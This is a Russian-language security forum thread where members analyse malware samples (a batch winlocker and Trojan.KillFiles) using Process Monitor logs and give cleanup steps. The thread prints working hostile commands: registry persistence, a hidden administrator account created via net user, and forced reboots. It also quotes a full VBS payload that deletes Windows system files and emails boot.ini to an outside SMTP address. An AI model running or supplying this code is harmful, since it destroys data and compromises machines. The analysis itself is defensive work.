Анализ вирусов посредством ProcMon и ProcExp

[0eck]

И этот в довесок
Winlock
Pass: 111

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

 

[модемщик]

Вот еще файл, протестируй если есть свободное время!

И этот в довесок

Завтра препарирую, а заодно и посмотрим, чем они отличаются.

 

[модемщик]

Анализ вируса из архива opera.rar
BAT.Shutdown.389 (по классификации dr.web)
Исходные данные:
ОС Win7 ult x32
Версия ОС: 6.1.7601 Service Pack 1 сборка 7601
Установленные обновления:
Definition Update for Windows Defender - KB915597 (Definition 1.149.1652.0)Включен UAC на максимальный уровень, работа ведется от администратора.


Вирус начал весьма бодренько, через 5 секунд компьютер ушел в перезагрузку, что меня категорически не устроило, поэтому я полез в локальные политики безопасности и снял с себя права на выключение.

После этого я перезашел в систему, дабы политики применились, и убедился, что кнопка выключения неактивна.

Вирус начал с банальности, распаковав себя в %temp%
Правда в виде bat файла.

Date & Time: 29.05.2013 21:30:27
Event Class: File System
Operation: CreateFile
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\Temp\B7AA.tmp\opera.bat
TID: 3632
Duration: 0.0000918
Desired Access: Generic Read/Write
Disposition: OverwriteIf
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: Read
AllocationSize: 0
OpenResult: Created

Дальше он через CMD запустил сам себя, извращенец.

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\cmd.exe
TID: 3632
Duration: 0.0000000
PID: 3672
Command line: cmd /c ""C:\Users\Freelncr\AppData\Local\Temp\B7AA.tmp\opera.bat""

Следующий шаг - безуспешная попытка скопировать себя в windows\system32

Date & Time: 29.05.2013 21:30:28
Event Class: File System
Operation: CreateFile
Result: ACCESS DENIED
Path: C:\Windows\System32\File.bat
TID: 3676
Duration: 0.0001202
Desired Access: Generic Write, Read Data/List Directory, Read Attributes, Delete
Disposition: OverwriteIf
Options: Sequential Access, Non-Directory File
Attributes: ANCI
ShareMode: None
AllocationSize: 0

Далее он с помощью утилиты reg добавил себя в автозагрузку HKLM

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3676
Duration: 0.0000000
PID: 3668
Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "C:\Windows\system32\File.bat" /f

Далее идет попытка отключить панель управления. Fail

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3676
Duration: 0.0000000
PID: 2472
Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Date & Time: 29.05.2013 21:30:28
Event Class: Registry
Operation: RegCreateKey
Result: ACCESS DENIED
Path: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
TID: 3792
Duration: 0.0000139
Desired Access: Read/Write

Следующий шаг - установка кодировки cp1251 для CMD.
Для чего - мы увидим через несколько шагов.

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Start
Result: SUCCESS
Path:
TID: 3676
Duration: 0.0000000
Parent PID: 3672
Command line: chcp 1251
Current directory: C:\Users\Freelncr\Desktop\

Далее вирус удаляет support юзера. Fail

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\net.exe
TID: 3676
Duration: 0.0000000
PID: 3024
Command line: net user SUPPORT_388945a0 /delete

И дальше начинается полная порнография. Вирус добавляет пользователя "Писька" с паролем 111. Fail
Вот зачем был нужен cp1251.

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Start
Result: SUCCESS
Path:
TID: 3676
Duration: 0.0000000
Parent PID: 3672
Command line: net user писька 111 /add

Далее вирус добавляет письку в администраторы, гы гы гы. Fail

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\net.exe
TID: 3676
Duration: 0.0000000
PID: 3772
Command line: net localgroup Администраторы писька /add

Удаляет support из пользователей, неуспешно.

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\net.exe
TID: 3676
Duration: 0.0000000
PID: 3748
Command line: net localgroup Пользователи SUPPORT_388945a0 /del

Далее создает ещё один bat файл в system32. Опять неуспешно, прям пичаль какая.

Date & Time: 29.05.2013 21:30:28
Event Class: File System
Operation: CreateFile
Result: ACCESS DENIED
Path: C:\Windows\System32\batinit.bat
TID: 3676
Duration: 0.0000398
Desired Access: Generic Write, Read Data/List Directory, Read Attributes, Delete
Disposition: OverwriteIf
Options: Sequential Access, Non-Directory File
Attributes: ANCI
ShareMode: None
AllocationSize: 0

Далее добавляет в autorun command processor свой батник. Да ещё с ошибками :)
"C:\Windows\syste m32\batinit.bat"

Этот ключ реестра отвечает за строчку, которая отображается в верху командной строки при запуске. Обычно это
"Microsoft Windows [Version 6.1.7601]
(c) Корпорация Майкрософт (Microsoft Corp.), 2009. Все права защищены."
Т.е данный батник обрабатывался бы при каждом запуске CMD.

в нашем случае это было чуть другое :)

Date & Time: 29.05.2013 21:30:28

Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3676
Duration: 0.0000000
PID: 2264
Command line: reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\batinit.bat" /f

Ну и конечно shutdown, даже с комментарием lol.

Date & Time: 29.05.2013 21:30:29
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\shutdown.exe
TID: 3676
Duration: 0.0000000
PID: 2832
Command line: shutdown -r -t 1 -c "lol"

Ну и одновременно с shutdown идет зачистка временных файлов и т.д.

Резюме:
Есть мнение, что создатель данного винлока ходит по городу и рисует слово "х.." на заборах, потому как данный вирус занимается исключительно созданием пользователя "писька" и прочим вандализмом.

Опасность: Средняя, при заражении может доставить уйму неприятностей, т.к. комп будет убегать в ребут сразу после входа в систему. Плюс нестандартный подход с
HKCU\SOFTWARE\Microsoft\Command Processor, что тоже может вызвать дополнительные проблемы.

В итоге данный винлок так и не смог провести заражение, UAC отработал на 5. Разве что компьютер он смог перезагрузить один раз, правда после перезагрузки вирусу было неоткуда запускаться, все попытки записаться в system32 были неуспешны.

Лечение : не требуется. Разве что нужно починить параметр
HKCU\SOFTWARE\Microsoft\Command Processor.
При успешном заражении ручное лечение будет заключаться в очистке параметров реестра :
"HKCU\SOFTWARE\Microsoft\Command Processor"
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Filel "
И удалении файлов:
C:\Windows\System32\File.bat
C:\Windows\System32\batinit.bat
Плюс потребуется удаление письки, гы гы гы.



Ну и напоследок скрин с вирустотала.

И второй, с анализом двухдневной давности.

 

[X-Shar]

Если есть желание, можно это проанализировать ?

Фейковый инсталлер + устанавливает вебалту-вирус + при попытке загрузить какой-либо файл из инета перекидывает на фейковый доунлодер + реклама каждые пять минут качает из инета + шпионит !:)

Запускал из под UAC сругался только на цифровую подпись, но нажал всё равно запустить...

Пароль:111

З.Ы. Данный файл на первых строчках в яндексе, при запросе Alcohol 52% !

 

[модемщик]

Вот еще файл, протестируй если есть свободное время!
Winlock
Pass: 111
***Скрытый текст***

Таки добрался до этого зловреда. Для начала скажу, что писал это чудо явный графоман, данная программа совершает просто невиданное количество действий. (как оказалось автор данного вируса - девачко, гы)

Анализ вируса из архива pikassa.rar
Trojan.KillFiles.11513 (по классификации dr.web)
Исходные данные:
ОС Win7 ult x32
Версия ОС: 6.1.7601 Service Pack 1 сборка 7601
Установленные обновления:
Definition Update for Windows Defender - KB915597 (Definition 1.149.1652.0)Включен UAC на максимальный уровень, работа ведется от администратора.

Особенность данного зловреда в том, что основная масса функций вируса работает через cmd и vbs
Забавно, но вирус можно открыть как текстовый файл и увидеть большую часть кода :)
Выглядит это так:

Сам код: Во вложенном текстовом документе.


Теперь по действиям вируса.
Первое - распаковка себя в %temp%

Date & Time: 22.06.2013 14:39:16
Event Class: File System
Operation: IRP_MJ_CREATE
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\Temp\7AFC.tmp
TID: 3416
Duration: 0.0306462
Desired Access: Generic Read
Disposition: Create
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: None
AllocationSize: 0
OpenResult: Created
Date & Time: 22.06.2013 14:39:16
Event Class: File System
Operation: IRP_MJ_CREATE
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\Temp\7AFC.tmp\picassa.bat
TID: 3416
Duration: 0.0005353
Desired Access: Generic Read/Write
Disposition: OverwriteIf
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: Read
AllocationSize: 0
OpenResult: Created

Далее запускается наш распакованный бат файл и создает в %temp% файлы temp.vbs

Date & Time: 22.06.2013 14:39:16
Event Class: File System
Operation: IRP_MJ_CREATE
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\Temp\temp1.vbs
TID: 3848
Duration: 0.0002271
Desired Access: Generic Write, Read Attributes
Disposition: OverwriteIf
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: Read
AllocationSize: 0
OpenResult: Created

Содержимое temp(1)(2).vbs

Спойлер

on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
fso.deletefile "C:\ntldr",1
fso.deletefolder "D:\Windows",1
fso.deletefolder "I:\Windows",1
fso.deletefolder "C:\Windows",1
sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot")
fso.deletefile sr+"\system32\hal.dll",1
sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot")
fso.deletefolder sr+"\system32\dllcache",1
sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot")
fso.deletefolder sr+"\system32\drives",1
s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™"
s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™"
s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™"
set application=createobject("shell.application")
application.minimizeall
i=50
while i>0 or i<0
S.popup "forum.whack.ru™",0, "forum.whack.ru™",0+16
i=i-1
wend
do
wscript.sleep 200
s.sendkeys"{capslock}"
wscript.sleep 200
s.sendkeys"{numlock}"
wscript.sleep 200
s.sendkeys"{scrolllock}"
loop
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).eject
next
End If
Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "[email protected]", "...", "Копм заражен!")
Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody)
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields
Flds.Item("

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

") = 2
Flds.Item("

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

") = 1
Flds.Item("

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

") = "support"
Flds.Item("

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

") = "support"
Flds.Item("

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

") = "smtp.mail.ru"
Flds.Item("

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

") = 25
Flds.Update
iMsg.Configuration = iConf
iMsg.To = strTo
iMsg.From = strFrom
iMsg.Subject = strSubject
iMsg.TextBody = strBody
iMsg.AddAttachment "c:\boot.ini"
iMsg.Send
End Function
Set iMsg = Nothing
Set iConf = Nothing
Set Flds = Nothing
s.run "shutdown -r -t 0 -c ""pcforumhack.ru™"" -f",1


on error resume next
set FSO=createobject("scripting.filesystemobject")
do
fso.getfile ("A:\")
loop


on error resume next
Set S = CreateObject("Wscript.Shell")
do
execute"S.Run ""C:\Windows\system32\cmd.exe /c echo "" & Chr(7), 0, True"
loop

В тексте присутствуют очень смешные строчки:

fso.deletefile "C:\ntldr",1
fso.deletefolder "D:\Windows",1

Разбирать дальнешие шаги я не буду, ибо это займет слишком много времени, ограничусь кратким разбором.

Классическое добавление себя в автозагрузку. Правда user32dll.bat вирус записать в папку виндовс даже не удосужился(даже и не пытался).

Date & Time: 22.06.2013 14:39:17
Event Class: Registry
Operation: RegSetValue
Result: SUCCESS
Path: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunExplorer32
TID: 3052
Duration: 0.0007715
Type: REG_SZ
Length: 50
Data: C:\Windows\user32dll.bat

Ещё из забавного - смена кнопок мыши при загрузке компьютера.

Date & Time: 22.06.2013 14:39:19
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3848
Duration: 0.0000000
PID: 3816
Command line: reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f

Напоследок вирус перезагружет компьютер с комментарием "LOL".

Date & Time: 22.06.2013 14:39:20
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\shutdown.exe
TID: 3848
Duration: 0.0000000
PID: 3552
Command line: shutdown -r -t 1 -c "lol"

Резюме - это не вирус, а так развлекательная программка, хотя вреда может нанести немало.

во вложении файл с кодом вируса, плюс лог ProcessMonitor(нечитаемый, ибо слишком большой)


ЗЫ: Такое слать на анализ не надо, ибо код данного чуда есть в свободном доступе.

 

[X-Shar]

Вот вроде как вирусы, Доктор их не видит, не запускал, в архиве 6-ть файлов, на момент публикации базы от 29.06.2013 10:51 !

В архиве 6-ть файлов, если интересно, можешь их проанализировать, может это фейки какие, не запускал, даже не знаю, что там:

Пароль:111

 

[Bless]

Что-то так и не увидел анализ вируса Neshta

 

[Marmot]

Есть, и даже в форме видео:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки